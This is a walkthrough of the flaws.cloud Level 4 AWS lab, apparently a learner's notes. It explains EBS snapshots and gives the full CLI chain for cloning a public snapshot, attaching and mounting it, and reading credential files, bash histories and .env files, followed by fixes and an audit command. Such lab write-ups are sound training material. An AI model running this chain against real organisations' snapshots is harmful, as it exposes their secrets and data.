flaws.cloud — Level 4¶
Vulnerability: Public EBS snapshot exposing the contents of a production server's disk
Core Concepts First¶
Before the commands make sense, you need these three things clear.
EBS vs Other Storage¶
EBS (Elastic Block Store) is a network-attached virtual hard drive for EC2 instances. Think of it exactly like a physical hard drive — it stores your OS, files, databases, config files, credentials. It persists independently of the EC2 instance: you can detach it from one instance and attach it to another, just like unplugging a hard drive and plugging it into a different computer.
| Storage Type | What it is | Persists after EC2 stop? | Accessible across instances? |
|---|---|---|---|
| EBS | Network-attached block storage (virtual hard drive) | Yes | Yes, one at a time |
| Instance Store | Physical disk on the host machine | No — gone when instance stops | No |
| S3 | Object storage (like a file server, not a hard drive) | N/A — not attached to instances | Yes, from anywhere |
| EFS | Network file system (like NFS, shared across instances) | Yes | Yes, simultaneously |
For this attack: EBS is the target because it contains the full filesystem — OS, config files, /etc/passwd, bash history, web app files, .env files, database files, SSH keys, etc.
Snapshot vs Backup — What's the difference?¶
A snapshot is an incremental point-in-time copy of an EBS volume stored in S3 (AWS's internal S3, not your buckets). The reason it's called a "snapshot" and not a "backup" is precise:
- Snapshot: An exact frozen image of the disk at one specific moment. Incremental — only stores blocks that changed since the last snapshot. AWS-native concept.
- Backup: A broader term for any copy of data for recovery purposes. Could be a snapshot, could be a file copy, could be a database dump, could be anything.
All snapshots are backups, but not all backups are snapshots. In AWS, "snapshot" specifically means the EBS incremental block-level copy mechanism.
Why are snapshots dangerous when public? A snapshot contains the entire disk at a point in time — every file, every credential, every database row, everything. If you make it public (or accidentally leave it with --restorable-by-users all), anyone with an AWS account can create a volume from it and read the disk.
Region vs Availability Zone¶
- Region: A geographic area containing multiple data centres. Example:
us-west-2= Oregon. Fully isolated from other regions. - Availability Zone (AZ): A specific data centre within a region. Example:
us-west-2a,us-west-2b,us-west-2c. AZs within a region are physically separate but connected by low-latency links.
Why does AZ matter for volumes? An EBS volume exists in a specific AZ. The EC2 instance you attach it to must be in the same AZ. You can't attach a volume in us-west-2a to an instance in us-west-2b — different physical data centres, no shared infrastructure. A snapshot, however, is region-level and can be used to create a new volume in any AZ within that region.
The Attack Chain¶
Public snapshot → Create volume from snapshot → Launch EC2 in same AZ → Attach volume → SSH in → Mount disk → Read files
Step 1 — Find the Public Snapshot¶
Breakdown:¶
| Part | What it does |
|---|---|
aws ec2 describe-snapshots |
List EBS snapshots |
--owner-ids 975426262029 |
Filter to snapshots owned by this specific AWS account ID (the flaws.cloud account). Without this, you'd get thousands of public AWS snapshots |
--profile level3 |
Use the credentials you found in level 3 (which belong to the flaws.cloud account) |
--region us-west-2 |
The region the snapshot is in |
How did we know the account ID? aws sts get-caller-identity with the level 3 credentials returns the Account field — that 12-digit number is the account ID. You use that to filter snapshots to just this account's.
The output gives you the SnapshotId (e.g., snap-0b49342abd1bdcb89) and crucially "IsPublic": true — confirming it's accessible to anyone.
Step 2 — Create a Volume from the Snapshot¶
aws ec2 create-volume \
--snapshot-id snap-0b49342abd1bdcb89 \
--availability-zone us-west-2a \
--profile default \
--region us-west-2
Breakdown:¶
| Part | What it does |
|---|---|
aws ec2 create-volume |
Create a new EBS volume |
--snapshot-id snap-0b49342abd1bdcb89 |
Create this volume from the snapshot — it gets an exact copy of the snapshot's data |
--availability-zone us-west-2a |
Where to create the volume. Must match the AZ of the EC2 you'll attach it to |
--profile default |
Use YOUR credentials (your own AWS account) — not the victim's. You're creating a resource in your own account |
--region us-west-2 |
The region must match the snapshot's region |
Why your own account? The snapshot is public — anyone can read it. You're creating a volume in your own account as a copy. You're not touching the victim's account. This is why the attack doesn't require compromising their account — just having an AWS account of your own.
Output gives you: VolumeId — e.g., vol-01dc86c00c9998941. Note this down.
{
"VolumeId": "vol-01dc86c00c9998941",
"Size": 8,
"SnapshotId": "snap-0b49342abd1bdcb89",
"AvailabilityZone": "us-west-2a",
"State": "creating",
"Encrypted": false
}
"Encrypted": false — not encrypted. If the snapshot had been encrypted with a KMS key you don't have access to, you'd get a blob of ciphertext and couldn't read anything useful.
Step 3 — Launch an EC2 Instance¶
aws ec2 create-key-pair \
--key-name flaws \
--query 'KeyMaterial' \
--output text \
--profile default \
--region us-west-2 > flaws.pem
chmod 400 flaws.pem
Key pair breakdown:¶
| Part | What it does |
|---|---|
aws ec2 create-key-pair |
Generate an RSA key pair on AWS. AWS keeps the public key; you save the private key |
--key-name flaws |
The name this key pair will be stored as in AWS |
--query 'KeyMaterial' |
Extract only the private key from the JSON response |
--output text |
Output as plain text (not JSON) — so it saves cleanly to the file |
> flaws.pem |
Redirect stdout to a file. This is your SSH private key |
chmod 400 flaws.pem |
Make the key read-only by owner only — SSH refuses to use a private key file with loose permissions (security enforcement) |
aws ec2 run-instances \
--image-id ami-0095b2d932ba790f3 \
--instance-type t3.micro \
--key-name flaws \
--placement AvailabilityZone=us-west-2a \
--profile default \
--region us-west-2
Breakdown:¶
| Part | What it does |
|---|---|
aws ec2 run-instances |
Launch one or more EC2 instances |
--image-id ami-0095b2d932ba790f3 |
The AMI (Amazon Machine Image) — the OS template. This is Amazon Linux 2023 |
--instance-type t3.micro |
The hardware spec — 2 vCPUs, 1 GB RAM. Free tier eligible |
--key-name flaws |
Which key pair to install on the instance for SSH access |
--placement AvailabilityZone=us-west-2a |
Must match the AZ of the volume you created |
--profile default |
Your credentials |
--region us-west-2 |
Region |
AMI (Amazon Machine Image): Think of it as a USB drive with a pre-installed OS. You pick which OS you want, it boots from that image. Different regions have different AMI IDs for the same OS — AMI IDs are region-specific.
Step 4 — Open SSH Access to Your IP¶
The EC2 launches with a security group that blocks all inbound traffic by default. You need to open port 22 (SSH) for your IP only.
# Get your public IP first
curl ifconfig.me
# Open SSH to your IP only
aws ec2 authorize-security-group-ingress \
--group-id sg-07532e1d41680d621 \
--protocol tcp \
--port 22 \
--cidr <YOUR_IP>/32 \
--profile default \
--region us-west-2
Breakdown:¶
| Part | What it does |
|---|---|
authorize-security-group-ingress |
Add an inbound allow rule to a security group |
--group-id sg-07532e1d41680d621 |
The security group ID (from the run-instances output) |
--protocol tcp |
TCP protocol (SSH uses TCP) |
--port 22 |
SSH port |
--cidr <YOUR_IP>/32 |
Allow ONLY your specific IP. /32 means exactly that one IP address (no range) |
Security group = AWS's virtual firewall. Works at the instance network interface level. Stateful — if you allow inbound on port 22, the return traffic is automatically allowed without an explicit outbound rule.
/32 CIDR notation: CIDR notation describes IP ranges. /32 means a single IP (all 32 bits are fixed). /24 would be a whole subnet (256 IPs). /0 would be every IP on the internet. Using /32 means only your exact IP can SSH in.
Step 5 — Attach the Volume¶
aws ec2 attach-volume \
--volume-id vol-01dc86c00c9998941 \
--instance-id i-02e76e84fbe738592 \
--device /dev/sdf \
--profile default \
--region us-west-2
Breakdown:¶
| Part | What it does |
|---|---|
attach-volume |
Attach an EBS volume to a running EC2 instance |
--volume-id |
The volume you created from the snapshot |
--instance-id |
Your EC2 instance (from run-instances output) |
--device /dev/sdf |
The device name to expose the volume as inside the OS. /dev/sdf through /dev/sdp are conventional names for attached EBS volumes |
--profile default |
Your credentials |
--region us-west-2 |
Must match both the volume's and instance's region |
Both must be in the same AZ. If they weren't, this command would fail with a zone mismatch error. This is why you specified us-west-2a for both when creating the volume and launching the instance.
Step 6 — SSH In and Find the Volume¶
# Get the public IP of your instance
aws ec2 describe-instances \
--instance-ids i-02e76e84fbe738592 \
--profile default \
--region us-west-2 \
--query 'Reservations[0].Instances[0].PublicIpAddress' \
--output text
# SSH in (ec2-user is the default for Amazon Linux)
ssh -i flaws.pem ec2-user@52.25.143.249
Default SSH usernames by distro:¶
| AMI/OS | Default username |
|---|---|
| Amazon Linux | ec2-user |
| Ubuntu | ubuntu |
| Debian | admin |
| CentOS | centos |
| RHEL | ec2-user |
| SUSE | ec2-user |
-i flaws.pem = identity file flag. Tells SSH which private key to authenticate with. Must match the key pair you specified when launching the instance.
Step 7 — lsblk to Identify the Disk¶
Output:
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINTS
nvme0n1 259:0 0 30G 0 disk
├─nvme0n1p1 259:1 0 30G 0 part /
├─nvme0n1p127 259:2 0 1M 0 part
└─nvme0n1p128 259:3 0 10M 0 part /boot/efi
nvme1n1 259:4 0 8G 0 disk
└─nvme1n1p1 259:5 0 8G 0 part
lsblk breakdown:¶
lsblk = list block devices. A block device is anything that stores data in fixed-size blocks — hard drives, SSDs, virtual disks, USBs.
| Column | Meaning |
|---|---|
NAME |
Device name |
MAJ:MIN |
Major/minor device numbers (kernel internal — ignore) |
RM |
Removable? (0=no, 1=yes) |
SIZE |
Disk/partition size |
RO |
Read-only? (0=no) |
TYPE |
disk = whole device, part = partition |
MOUNTPOINTS |
Where it's mounted (empty = not yet mounted) |
Why nvme1n1 and not nvme0n1?¶
nvme0n1is 30G — that's the root volume of your EC2 instance (the OS disk). It's mounted at/.nvme1n1is 8G — that matches the"Size": 8from the snapshot/volume creation output. This is the attached disk.
The naming convention: nvme = NVMe (the interface protocol AWS uses for EBS on modern instances). 0n1 = controller 0, namespace 1 (the first disk). 1n1 = controller 1, namespace 1 (the second disk).
Modern AWS instances expose EBS volumes as NVMe devices even though you specified /dev/sdf in the attach command — the OS translates that to nvme1n1. Older instance types show xvdf, xvdg, etc. lsblk always shows you the actual device name the kernel sees.
Step 8 — Mount and Read¶
Breakdown:¶
| Command | What it does |
|---|---|
mkdir /mnt/flaws |
Create a mount point — just an empty directory that acts as the entry point to the volume |
mount /dev/nvme1n1p1 /mnt/flaws |
Mount partition 1 of the attached volume at that directory. Everything on the volume's filesystem is now accessible under /mnt/flaws/ |
sudo |
Root required for both — mounting is a privileged operation |
Why nvme1n1p1 and not nvme1n1? The p1 means partition 1. The disk (nvme1n1) has a partition table, and the actual filesystem lives on the first partition (p1). You always mount partitions, not raw disks (unless the disk has no partition table). lsblk showed nvme1n1p1 nested under nvme1n1 — that's how you know the partition structure.
Step 9 — Enumerate the Mounted Disk¶
ls /mnt/flaws # see the filesystem layout
cat /mnt/flaws/etc/passwd # list all user accounts on the original server
cat /mnt/flaws/home/*/.bash_history # command history of all users
find /mnt/flaws -name "*.conf" 2>/dev/null # config files
find /mnt/flaws -name "*.env" 2>/dev/null # .env files (often contain DB passwords, API keys)
find /mnt/flaws -name "credentials" 2>/dev/null # AWS credentials files
cat /mnt/flaws/var/www/html/*.php 2>/dev/null # web app source code
You now have unrestricted read access to the entire disk of the original server. Every file, every config, every credential it ever had is readable.
Utility Commands¶
# List your volumes
aws ec2 describe-volumes --profile default --region us-west-2
# List instances with IDs and states (table format)
aws ec2 describe-instances \
--profile default \
--region us-west-2 \
--query 'Reservations[].Instances[].[InstanceId,State.Name]' \
--output table
# Terminate instances when done (avoid charges)
aws ec2 terminate-instances \
--instance-ids i-02e76e84fbe738592 \
--profile default \
--region us-west-2
Vulnerability Summary¶
The flaw: EBS snapshot with createVolumePermissions set to all — publicly copyable by any AWS account.
Why you needed your own AWS account: The snapshot is public, but "public" in AWS means "any authenticated AWS user can use it." You create the volume in your own account, billed to you, and you own it. The victim's account is never touched after step 1.
Why AZ matters: EBS volumes are AZ-scoped physical resources. An instance and its attached volume must be in the same AZ because they're connected over local network fabric within that data centre. Cross-AZ EBS attachment is architecturally impossible.
Why nvme1n1 was the right device:
nvme0n1 (30G) = your EC2's root OS disk. nvme1n1 (8G) = the attached volume. You matched it by size to the snapshot's VolumeSize: 8.
Full attack chain:
1. Get level 3 credentials via git history
2. describe-snapshots --owner-ids <account-id> → find public snapshot
3. create-volume --snapshot-id <id> --availability-zone us-west-2a → clone into your account
4. run-instances --placement AvailabilityZone=us-west-2a → launch EC2 in same AZ
5. attach-volume → attach the cloned disk
6. SSH in → lsblk → identify the attached disk → mount it
7. Read everything: bash history, .env files, web app code, AWS credentials
8. Find the next level's URL in the files
The fix:
- Snapshots should be private by default — never set createVolumePermission: all
- Encrypt EBS volumes with KMS. Even if a snapshot is public, encrypted data is useless without the KMS key
- Audit periodically: aws ec2 describe-snapshots --owner-ids self --query 'Snapshots[?Public==true]'